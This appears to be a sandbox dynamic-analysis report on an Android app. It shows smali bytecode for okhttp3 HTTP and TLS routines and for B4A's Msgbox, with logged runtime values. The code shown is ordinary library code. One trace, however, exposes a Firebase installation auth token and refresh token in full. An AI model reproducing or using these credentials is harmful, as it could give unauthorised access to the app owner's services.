                        63goto_55: return-void
                        APIs
                        • java.util.TimeZone.getTimeZone
                        • java.lang.Class.desiredAssertionStatus
                        • java.lang.Class.getName
                        Strings
                        • efbbbf
                        • feff
                        • fffe
                        • 0000ffff
                        • ffff0000
                        • GMT
                        • ([0-9a-fA-F]*:[0-9a-fA-F:.]*)|([\\d.]+)
                        • ([0-9a-fA-F]*:[0-9a-fA-F:.]*)|([\d.]+)
                        • OkHttpClient::class.java.name
                        • okhttp3.
                        • Client
                        Position Instruction Meta Information
                        0const/4 v0, 0x0
                        1new-array v1, v0, [B
                        2sput-object v1, Lokhttp3/internal/Util;->EMPTY_BYTE_ARRAY:[B
                        4sget-object v1, Lokhttp3/Headers;->Companion:Lokhttp3/Headers$Companion;
                        5new-array v2, v0, [Ljava/lang/String;
                        7invoke-virtual {v1, v2}, Lokhttp3/Headers$Companion;->of([Ljava/lang/String;)Lokhttp3/Headers;
                        8move-result-object v1
                        9sput-object v1, Lokhttp3/internal/Util;->EMPTY_HEADERS:Lokhttp3/Headers;
                        11sget-object v1, Lokhttp3/ResponseBody;->Companion:Lokhttp3/ResponseBody$Companion;
                        13sget-object v2, Lokhttp3/internal/Util;->EMPTY_BYTE_ARRAY:[B
                        14const/4 v3, 0x0
                        15const/4 v4, 0x1
                        17invoke-static {v1, v2, v3, v4, v3}, Lokhttp3/ResponseBody$Companion;->create$default(Lokhttp3/ResponseBody$Companion;[BLokhttp3/MediaType;ILjava/lang/Object;)Lokhttp3/ResponseBody;
                        18move-result-object v1
                        19sput-object v1, Lokhttp3/internal/Util;->EMPTY_RESPONSE:Lokhttp3/ResponseBody;
                        21sget-object v5, Lokhttp3/RequestBody;->Companion:Lokhttp3/RequestBody$Companion;
                        23sget-object v6, Lokhttp3/internal/Util;->EMPTY_BYTE_ARRAY:[B
                        24const/4 v7, 0x0
                        25const/4 v8, 0x0
                        26const/4 v9, 0x0
                        27const/4 v10, 0x7
                        28const/4 v11, 0x0
                        30invoke-static/range {v5 .. v11}, Lokhttp3/RequestBody$Companion;->create$default(Lokhttp3/RequestBody$Companion;[BLokhttp3/MediaType;IIILjava/lang/Object;)Lokhttp3/RequestBody;
                        31move-result-object v1
                        32sput-object v1, Lokhttp3/internal/Util;->EMPTY_REQUEST:Lokhttp3/RequestBody;
                        34sget-object v1, Lokio/Options;->Companion:Lokio/Options$Companion;
                        35const/4 v2, 0x5
                        36new-array v2, v2, [Lokio/ByteString;
                        38sget-object v3, Lokio/ByteString;->Companion:Lokio/ByteString$Companion;
                        40const-string v5, "efbbbf"
                        42invoke-virtual {v3, v5}, Lokio/ByteString$Companion;->decodeHex(Ljava/lang/String;)Lokio/ByteString;
                        43move-result-object v3
                        44aput-object v3, v2, v0
                        46sget-object v0, Lokio/ByteString;->Companion:Lokio/ByteString$Companion;
                        48const-string v3, "feff"
                        50invoke-virtual {v0, v3}, Lokio/ByteString$Companion;->decodeHex(Ljava/lang/String;)Lokio/ByteString;
                        51move-result-object v0
                        52aput-object v0, v2, v4
                        54sget-object v0, Lokio/ByteString;->Companion:Lokio/ByteString$Companion;
                        56const-string v3, "fffe"
                        58invoke-virtual {v0, v3}, Lokio/ByteString$Companion;->decodeHex(Ljava/lang/String;)Lokio/ByteString;
                        59move-result-object v0
                        60const/4 v3, 0x2
                        61aput-object v0, v2, v3
                        63sget-object v0, Lokio/ByteString;->Companion:Lokio/ByteString$Companion;
                        65const-string v3, "0000ffff"
                        67invoke-virtual {v0, v3}, Lokio/ByteString$Companion;->decodeHex(Ljava/lang/String;)Lokio/ByteString;
                        68move-result-object v0
                        69const/4 v3, 0x3
                        70aput-object v0, v2, v3
                        72sget-object v0, Lokio/ByteString;->Companion:Lokio/ByteString$Companion;
                        74const-string v3, "ffff0000"
                        76invoke-virtual {v0, v3}, Lokio/ByteString$Companion;->decodeHex(Ljava/lang/String;)Lokio/ByteString;
                        77move-result-object v0
                        78const/4 v3, 0x4
                        79aput-object v0, v2, v3
                        81invoke-virtual {v1, v2}, Lokio/Options$Companion;->of([Lokio/ByteString;)Lokio/Options;
                        82move-result-object v0
                        83sput-object v0, Lokhttp3/internal/Util;->UNICODE_BOMS:Lokio/Options;
                        85const-string v0, "GMT"
                        87invoke-static {v0}, Ljava/util/TimeZone;->getTimeZone(Ljava/lang/String;)Ljava/util/TimeZone;
                        88move-result-object v0
                        90invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        91sput-object v0, Lokhttp3/internal/Util;->UTC:Ljava/util/TimeZone;
                        92new-instance v0, Lkotlin/text/Regex;
                        94const-string v1, "([0-9a-fA-F]*:[0-9a-fA-F:.]*)|([\\d.]+)"
                        96invoke-direct {v0, v1}, Lkotlin/text/Regex;-><init>(Ljava/lang/String;)V
                        • Time: 690648
                          • p0: ?
                          • Return:
                            • ([0-9a-fA-F]*:[0-9a-fA-F:.]*)|([\d.]+)
                        97sput-object v0, Lokhttp3/internal/Util;->VERIFY_AS_IP_ADDRESS:Lkotlin/text/Regex;
                        98const-class v0, Lokhttp3/OkHttpClient;
                        100invoke-virtual {v0}, Ljava/lang/Class;->desiredAssertionStatus()Z
                        101move-result v0
                        102sput-boolean v0, Lokhttp3/internal/Util;->assertionsEnabled:Z
                        103const-class v0, Lokhttp3/OkHttpClient;
                        105invoke-virtual {v0}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        106move-result-object v0
                        108const-string v1, "OkHttpClient::class.java.name"
                        110invoke-static {v0, v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        112const-string v1, "okhttp3."
                        113check-cast v1, Ljava/lang/CharSequence;
                        115invoke-static {v0, v1}, Lkotlin/text/StringsKt;->removePrefix(Ljava/lang/String;Ljava/lang/CharSequence;)Ljava/lang/String;
                        116move-result-object v0
                        118const-string v1, "Client"
                        119check-cast v1, Ljava/lang/CharSequence;
                        121invoke-static {v0, v1}, Lkotlin/text/StringsKt;->removeSuffix(Ljava/lang/String;Ljava/lang/CharSequence;)Ljava/lang/String;
                        122move-result-object v0
                        123sput-object v0, Lokhttp3/internal/Util;->okHttpName:Ljava/lang/String;
                        124return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.IOException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        Strings
                        • HTTP/1.1 200 OK
                        • unexpected end of stream on
                        • state:
                        Position Instruction Meta Information
                        0iget v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec;->state:I
                        1const/4 v1, 0x3
                        2const/4 v2, 0x1
                        3if-eq v0, v2, :cond_a
                        4if-ne v0, v1, :cond_9
                        5goto/16 :goto_a
                        6cond_9: const/4 v2, 0x0
                        7cond_a: if-eqz v2, :cond_7e
                        8try_start_c:
                        9sget-object v0, Lokhttp3/internal/http/StatusLine;->Companion:Lokhttp3/internal/http/StatusLine$Companion;
                        11iget-object v2, p0, Lokhttp3/internal/http1/Http1ExchangeCodec;->headersReader:Lokhttp3/internal/http1/HeadersReader;
                        13invoke-virtual {v2}, Lokhttp3/internal/http1/HeadersReader;->readLine()Ljava/lang/String;
                        • Time: 699728
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • HTTP/1.1 200 OK
                        14move-result-object v2
                        16invoke-virtual {v0, v2}, Lokhttp3/internal/http/StatusLine$Companion;->parse(Ljava/lang/String;)Lokhttp3/internal/http/StatusLine;
                        17move-result-object v0
                        18new-instance v2, Lokhttp3/Response$Builder;
                        20invoke-direct {v2}, Lokhttp3/Response$Builder;-><init>()V
                        22iget-object v3, v0, Lokhttp3/internal/http/StatusLine;->protocol:Lokhttp3/Protocol;
                        24invoke-virtual {v2, v3}, Lokhttp3/Response$Builder;->protocol(Lokhttp3/Protocol;)Lokhttp3/Response$Builder;
                        25move-result-object v2
                        26iget v3, v0, Lokhttp3/internal/http/StatusLine;->code:I
                        28invoke-virtual {v2, v3}, Lokhttp3/Response$Builder;->code(I)Lokhttp3/Response$Builder;
                        29move-result-object v2
                        31iget-object v3, v0, Lokhttp3/internal/http/StatusLine;->message:Ljava/lang/String;
                        33invoke-virtual {v2, v3}, Lokhttp3/Response$Builder;->message(Ljava/lang/String;)Lokhttp3/Response$Builder;
                        34move-result-object v2
                        36iget-object v3, p0, Lokhttp3/internal/http1/Http1ExchangeCodec;->headersReader:Lokhttp3/internal/http1/HeadersReader;
                        38invoke-virtual {v3}, Lokhttp3/internal/http1/HeadersReader;->readHeaders()Lokhttp3/Headers;
                        39move-result-object v3
                        41invoke-virtual {v2, v3}, Lokhttp3/Response$Builder;->headers(Lokhttp3/Headers;)Lokhttp3/Response$Builder;
                        42move-result-object v2
                        43const/16 v3, 0x64
                        44if-eqz p1, :cond_43
                        45iget p1, v0, Lokhttp3/internal/http/StatusLine;->code:I
                        46if-ne p1, v3, :cond_43
                        47const/4 v2, 0x0
                        48goto/16 :goto_4d
                        49cond_43: iget p1, v0, Lokhttp3/internal/http/StatusLine;->code:I
                        50if-ne p1, v3, :cond_4a
                        51iput v1, p0, Lokhttp3/internal/http1/Http1ExchangeCodec;->state:I
                        52goto/16 :goto_4d
                        53cond_4a: const/4 p1, 0x4
                        54iput p1, p0, Lokhttp3/internal/http1/Http1ExchangeCodec;->state:I
                        55goto_4d: return-object v2
                        56catch_4e: move-exception p1
                        58invoke-virtual {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        59move-result-object v0
                        61invoke-virtual {v0}, Lokhttp3/internal/connection/RealConnection;->route()Lokhttp3/Route;
                        62move-result-object v0
                        64invoke-virtual {v0}, Lokhttp3/Route;->address()Lokhttp3/Address;
                        65move-result-object v0
                        67invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        68move-result-object v0
                        70invoke-virtual {v0}, Lokhttp3/HttpUrl;->redact()Ljava/lang/String;
                        71move-result-object v0
                        72new-instance v1, Ljava/io/IOException;
                        73new-instance v2, Ljava/lang/StringBuilder;
                        75invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        77const-string v3, "unexpected end of stream on "
                        79invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        81invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        83invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        84move-result-object v0
                        85check-cast p1, Ljava/lang/Throwable;
                        87invoke-direct {v1, v0, p1}, Ljava/io/IOException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        88check-cast v1, Ljava/lang/Throwable;
                        89throw v1
                        90cond_7e: new-instance p1, Ljava/lang/StringBuilder;
                        92invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        94const-string v0, "state: "
                        96invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        97iget v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec;->state:I
                        99invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        101invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        102move-result-object p1
                        103new-instance v0, Ljava/lang/IllegalStateException;
                        105invoke-virtual {p1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        106move-result-object p1
                        108invoke-direct {v0, p1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        109check-cast v0, Ljava/lang/Throwable;
                        110throw v0
                        APIs
                        • java.lang.Math.min
                        • java.net.ProtocolException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • sink
                        • unexpected end of stream
                        • closed
                        • byteCount < 0:
                        Position Instruction Meta Information
                        1const-string v0, "sink"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        4const/4 v0, 0x1
                        5const-wide/16 v1, 0x0
                        6cmp-long v3, p2, v1
                        7if-ltz v3, :cond_e
                        8const/4 v3, 0x1
                        9goto/16 :goto_f
                        10cond_e: const/4 v3, 0x0
                        11goto_f: if-eqz v3, :cond_69
                        13invoke-virtual {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->getClosed()Z
                        • Time: 700514
                          • This:
                            • okhttp3.internal.http1.Http1ExchangeCodec$ChunkedSource@68f936f
                          • Return:
                            • false
                        14move-result v3
                        15xor-int/2addr v0, v3
                        16if-eqz v0, :cond_5b
                        17iget-boolean v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->hasMoreChunks:Z
                        18const-wide/16 v3, -0x1
                        19if-nez v0, :cond_1f
                        20return-wide v3
                        21cond_1f: iget-wide v5, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        22cmp-long v0, v5, v1
                        23if-eqz v0, :cond_29
                        24cmp-long v0, v5, v3
                        25if-nez v0, :cond_31
                        26cond_29:
                        27invoke-direct {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->readChunkSize()V
                        28iget-boolean v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->hasMoreChunks:Z
                        29if-nez v0, :cond_31
                        30return-wide v3
                        31cond_31: iget-wide v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        33invoke-static {p2, p3, v0, v1}, Ljava/lang/Math;->min(JJ)J
                        34move-result-wide p2
                        36invoke-super {p0, p1, p2, p3}, Lokhttp3/internal/http1/Http1ExchangeCodec$AbstractSource;->read(Lokio/Buffer;J)J
                        37move-result-wide p1
                        38cmp-long p3, p1, v3
                        39if-eqz p3, :cond_45
                        40iget-wide v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        41sub-long/2addr v0, p1
                        42iput-wide v0, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->bytesRemainingInChunk:J
                        43return-wide p1
                        44cond_45:
                        45iget-object p1, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        47invoke-virtual {p1}, Lokhttp3/internal/http1/Http1ExchangeCodec;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        48move-result-object p1
                        50invoke-virtual {p1}, Lokhttp3/internal/connection/RealConnection;->noNewExchanges$okhttp()V
                        51new-instance p1, Ljava/net/ProtocolException;
                        53const-string p2, "unexpected end of stream"
                        55invoke-direct {p1, p2}, Ljava/net/ProtocolException;-><init>(Ljava/lang/String;)V
                        57invoke-virtual {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec$ChunkedSource;->responseBodyComplete()V
                        58check-cast p1, Ljava/lang/Throwable;
                        59throw p1
                        60cond_5b: new-instance p1, Ljava/lang/IllegalStateException;
                        62const-string p2, "closed"
                        64invoke-virtual {p2}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        65move-result-object p2
                        67invoke-direct {p1, p2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        68check-cast p1, Ljava/lang/Throwable;
                        69throw p1
                        70cond_69: new-instance p1, Ljava/lang/StringBuilder;
                        72invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        74const-string v0, "byteCount < 0: "
                        76invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        78invoke-virtual {p1, p2, p3}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
                        80invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        81move-result-object p1
                        82new-instance p2, Ljava/lang/IllegalArgumentException;
                        84invoke-virtual {p1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        85move-result-object p1
                        87invoke-direct {p2, p1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        88check-cast p2, Ljava/lang/Throwable;
                        89throw p2
                        APIs
                        • java.lang.Math.min
                        • java.net.ProtocolException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • sink
                        • unexpected end of stream
                        • closed
                        • byteCount < 0:
                        Position Instruction Meta Information
                        1const-string v0, "sink"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        4const/4 v0, 0x1
                        5const-wide/16 v1, 0x0
                        6cmp-long v3, p2, v1
                        7if-ltz v3, :cond_e
                        8const/4 v3, 0x1
                        9goto/16 :goto_f
                        10cond_e: const/4 v3, 0x0
                        11goto_f: if-eqz v3, :cond_5e
                        13invoke-virtual {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec$FixedLengthSource;->getClosed()Z
                        • Time: 700188
                          • This:
                            • okhttp3.internal.http1.Http1ExchangeCodec$FixedLengthSource@a29129a
                          • Return:
                            • false
                        14move-result v3
                        15xor-int/2addr v0, v3
                        16if-eqz v0, :cond_50
                        17iget-wide v3, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$FixedLengthSource;->bytesRemaining:J
                        18const-wide/16 v5, -0x1
                        19cmp-long v0, v3, v1
                        20if-nez v0, :cond_21
                        21return-wide v5
                        22cond_21:
                        23invoke-static {v3, v4, p2, p3}, Ljava/lang/Math;->min(JJ)J
                        24move-result-wide p2
                        26invoke-super {p0, p1, p2, p3}, Lokhttp3/internal/http1/Http1ExchangeCodec$AbstractSource;->read(Lokio/Buffer;J)J
                        27move-result-wide p1
                        28cmp-long p3, p1, v5
                        29if-eqz p3, :cond_3a
                        30iget-wide v3, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$FixedLengthSource;->bytesRemaining:J
                        31sub-long/2addr v3, p1
                        32iput-wide v3, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$FixedLengthSource;->bytesRemaining:J
                        33cmp-long p3, v3, v1
                        34if-nez p3, :cond_39
                        36invoke-virtual {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec$FixedLengthSource;->responseBodyComplete()V
                        37cond_39: return-wide p1
                        38cond_3a:
                        39iget-object p1, p0, Lokhttp3/internal/http1/Http1ExchangeCodec$FixedLengthSource;->this$0:Lokhttp3/internal/http1/Http1ExchangeCodec;
                        41invoke-virtual {p1}, Lokhttp3/internal/http1/Http1ExchangeCodec;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        42move-result-object p1
                        44invoke-virtual {p1}, Lokhttp3/internal/connection/RealConnection;->noNewExchanges$okhttp()V
                        45new-instance p1, Ljava/net/ProtocolException;
                        47const-string p2, "unexpected end of stream"
                        49invoke-direct {p1, p2}, Ljava/net/ProtocolException;-><init>(Ljava/lang/String;)V
                        51invoke-virtual {p0}, Lokhttp3/internal/http1/Http1ExchangeCodec$FixedLengthSource;->responseBodyComplete()V
                        52check-cast p1, Ljava/lang/Throwable;
                        53throw p1
                        54cond_50: new-instance p1, Ljava/lang/IllegalStateException;
                        56const-string p2, "closed"
                        58invoke-virtual {p2}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        59move-result-object p2
                        61invoke-direct {p1, p2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        62check-cast p1, Ljava/lang/Throwable;
                        63throw p1
                        64cond_5e: new-instance p1, Ljava/lang/StringBuilder;
                        66invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        68const-string v0, "byteCount < 0: "
                        70invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        72invoke-virtual {p1, p2, p3}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
                        74invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        75move-result-object p1
                        76new-instance p2, Ljava/lang/IllegalArgumentException;
                        78invoke-virtual {p1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        79move-result-object p1
                        81invoke-direct {p2, p1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        82check-cast p2, Ljava/lang/Throwable;
                        83throw p2
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • okhttp3.TlsVersion.javaName
                        • java.util.Collection.add
                        • java.util.Collection.toArray
                        • java.util.Arrays.copyOf
                        • java.lang.NullPointerException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • tlsVersions
                        • TLSv1.1
                        • TLSv1.2
                        • TLSv1.3
                        • TLSv1
                        • null cannot be cast to non-null type kotlin.Array<T>
                        • no TLS versions for cleartext connections
                        Position Instruction Meta Information
                        1const-string v0, "tlsVersions"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        4move-object v0, p0
                        5check-cast v0, Lokhttp3/ConnectionSpec$Builder;
                        6iget-boolean v1, v0, Lokhttp3/ConnectionSpec$Builder;->tls:Z
                        7if-eqz v1, :cond_47
                        8new-instance v1, Ljava/util/ArrayList;
                        9array-length v2, p1
                        11invoke-direct {v1, v2}, Ljava/util/ArrayList;-><init>(I)V
                        12check-cast v1, Ljava/util/Collection;
                        13array-length v2, p1
                        14const/4 v3, 0x0
                        15const/4 v4, 0x0
                        16goto_17: if-ge v4, v2, :cond_25
                        17aget-object v5, p1, v4
                        19invoke-virtual {v5}, Lokhttp3/TlsVersion;->javaName()Ljava/lang/String;
                        • Time: 697020
                          • This:
                            • TLS_1_3
                          • Return:
                            • TLSv1.3
                        • Time: 697022
                          • This:
                            • TLS_1_2
                          • Return:
                            • TLSv1.2
                        • Time: 697077
                          • This:
                            • TLS_1_1
                          • Return:
                            • TLSv1.1
                        • Time: 697078
                          • This:
                            • TLS_1_0
                          • Return:
                            • TLSv1
                        20move-result-object v5
                        22invoke-interface {v1, v5}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        23add-int/lit8 v4, v4, 0x1
                        24goto/16 :goto_17
                        25cond_25: check-cast v1, Ljava/util/List;
                        26check-cast v1, Ljava/util/Collection;
                        27new-array p1, v3, [Ljava/lang/String;
                        29invoke-interface {v1, p1}, Ljava/util/Collection;->toArray([Ljava/lang/Object;)[Ljava/lang/Object;
                        30move-result-object p1
                        31if-eqz p1, :cond_3f
                        32check-cast p1, [Ljava/lang/String;
                        33array-length v1, p1
                        35invoke-static {p1, v1}, Ljava/util/Arrays;->copyOf([Ljava/lang/Object;I)[Ljava/lang/Object;
                        36move-result-object p1
                        37check-cast p1, [Ljava/lang/String;
                        39invoke-virtual {v0, p1}, Lokhttp3/ConnectionSpec$Builder;->tlsVersions([Ljava/lang/String;)Lokhttp3/ConnectionSpec$Builder;
                        40move-result-object p1
                        41return-object p1
                        42cond_3f: new-instance p1, Ljava/lang/NullPointerException;
                        44const-string v0, "null cannot be cast to non-null type kotlin.Array<T>"
                        46invoke-direct {p1, v0}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        47throw p1
                        48cond_47: new-instance p1, Ljava/lang/IllegalArgumentException;
                        50const-string v0, "no TLS versions for cleartext connections"
                        52invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        53move-result-object v0
                        55invoke-direct {p1, v0}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        56check-cast p1, Ljava/lang/Throwable;
                        57goto/16 :goto_56
                        58goto_55: throw p1
                        59goto_56: goto/16 :goto_55
                        APIs
                        • java.lang.Object.<init>
                        • java.util.ArrayList.<init>
                        • java.lang.Class.getDeclaredMethod
                        • java.lang.reflect.Method.setAccessible
                        • java.lang.Class.getDeclaredField
                        • java.lang.reflect.Field.setAccessible
                        • java.lang.Class.getDeclaredField
                        • java.lang.reflect.Field.setAccessible
                        • java.lang.Class.getDeclaredMethod
                        • java.lang.reflect.Method.setAccessible
                        • java.lang.Exception.printStackTrace
                        Strings
                        • next
                        • when
                        • flags
                        • recycleUnchecked
                        Position Instruction Meta Information
                        0new-instance v0, Ljava/lang/Object;
                        2invoke-direct {v0}, Ljava/lang/Object;-><init>()V
                        3sput-object v0, Lanywheresoftware/b4a/Msgbox;->closeMyLoop:Ljava/lang/Object;
                        4const/4 v0, 0x0
                        5sput-boolean v0, Lanywheresoftware/b4a/Msgbox;->stopCodeAfterDismiss:Z
                        6sput-boolean v0, Lanywheresoftware/b4a/Msgbox;->isDismissing:Z
                        7new-instance v1, Ljava/util/ArrayList;
                        9invoke-direct {v1}, Ljava/util/ArrayList;-><init>()V
                        10sput-object v1, Lanywheresoftware/b4a/Msgbox;->listOfAsyncDialogs:Ljava/util/ArrayList;
                        11try_start_13: const-class v1, Landroid/os/MessageQueue;
                        13const-string v2, "next"
                        14const/4 v3, 0x0
                        16invoke-virtual {v1, v2, v3}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 685674
                          • This:
                            • class android.os.MessageQueue
                            • getName:android.os.MessageQueue
                          • p0: next
                          • p1: null
                          • Return:
                            • android.os.Message android.os.MessageQueue.next()
                            • getName: next
                        17move-result-object v1
                        18sput-object v1, Lanywheresoftware/b4a/Msgbox;->nextM:Ljava/lang/reflect/Method;
                        19const/4 v2, 0x1
                        21invoke-virtual {v1, v2}, Ljava/lang/reflect/Method;->setAccessible(Z)V
                        22const-class v1, Landroid/os/Message;
                        24const-string v4, "when"
                        26invoke-virtual {v1, v4}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        • Time: 685675
                          • This:
                            • class android.os.Message
                            • getName:android.os.Message
                          • p0: {"Fid":"d9xwbLNgRIa-GJ0ARZ7KzJ","Status":3,"AuthToken":"eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhcHBJZCI6IjE6NTQ0NzgyMjg3NjcxOmFuZHJvaWQ6MDVjYmQwOGIxZTBhM2FiNWZhOTBiMiIsImV4cCI6MTY5NzAxNzc4MCwiZmlkIjoiZDl4d2JMTmdSSWEtR0owQVJaN0t6SiIsInByb2plY3ROdW1iZXIiOjU0NDc4MjI4NzY3MX0.AB2LPV8wRQIgG3nZ6E1Ipj9WBW4qyjdbd41HxX1l9GCLgypg8geur5cCIQCelEiGrjM7leXD6IGU0L5-CpyCyXhMi8sSwAbQ8iykTg","RefreshToken":"3_AS3qfwKb0nDu8SpNao4h1cmOr5n6Ew7WsNGNfmnDVKFrrsLXQ9SE1i2yE4wjpMmSRNnXjwLbH5QZik0cTNSooZPLi5s0s4QGGNuFQF9zHR8J2VM","TokenCreationEpochInSecs":1696412980,"ExpiresInSecs":604800}
                          • Return:
                            • public long android.os.Message.when
                            • getName: when
                        27move-result-object v1
                        28sput-object v1, Lanywheresoftware/b4a/Msgbox;->whenF:Ljava/lang/reflect/Field;
                        30invoke-virtual {v1, v2}, Ljava/lang/reflect/Field;->setAccessible(Z)V
                        31sput-object v3, Lanywheresoftware/b4a/Msgbox;->flagsF:Ljava/lang/reflect/Field;
                        32try_end_31: const-class v1, Landroid/os/Message;
                        34const-string v3, "flags"
                        36invoke-virtual {v1, v3}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        • Time: 685677
                          • This:
                            • class android.os.Message
                            • getName:android.os.Message
                          • p0: com.google.android.gms
                          • Return:
                            • int android.os.Message.flags
                            • getName: flags
                        37move-result-object v1
                        38sput-object v1, Lanywheresoftware/b4a/Msgbox;->flagsF:Ljava/lang/reflect/Field;
                        40invoke-virtual {v1, v2}, Ljava/lang/reflect/Field;->setAccessible(Z)V
                        41const-class v1, Landroid/os/Message;
                        43const-string v3, "recycleUnchecked"
                        44new-array v0, v0, [Ljava/lang/Class;
                        46invoke-virtual {v1, v3, v0}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 685678
                          • This:
                            • class android.os.Message
                            • getName:android.os.Message
                          • p0: recycleUnchecked
                          • p1: [Ljava.lang.Class;@9fb8a0e
                          • Return:
                            • android.os.Message android.os.MessageQueue.next()
                            • getName: next
                        47move-result-object v0
                        48sput-object v0, Lanywheresoftware/b4a/Msgbox;->recycleUnchecked:Ljava/lang/reflect/Method;
                        50invoke-virtual {v0, v2}, Ljava/lang/reflect/Method;->setAccessible(Z)V
                        51try_end_4d: goto/16 :goto_52
                        52catch_4e: move-exception v0
                        54invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
                        55goto_52: return-void
                        Cross References
                        APIs
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
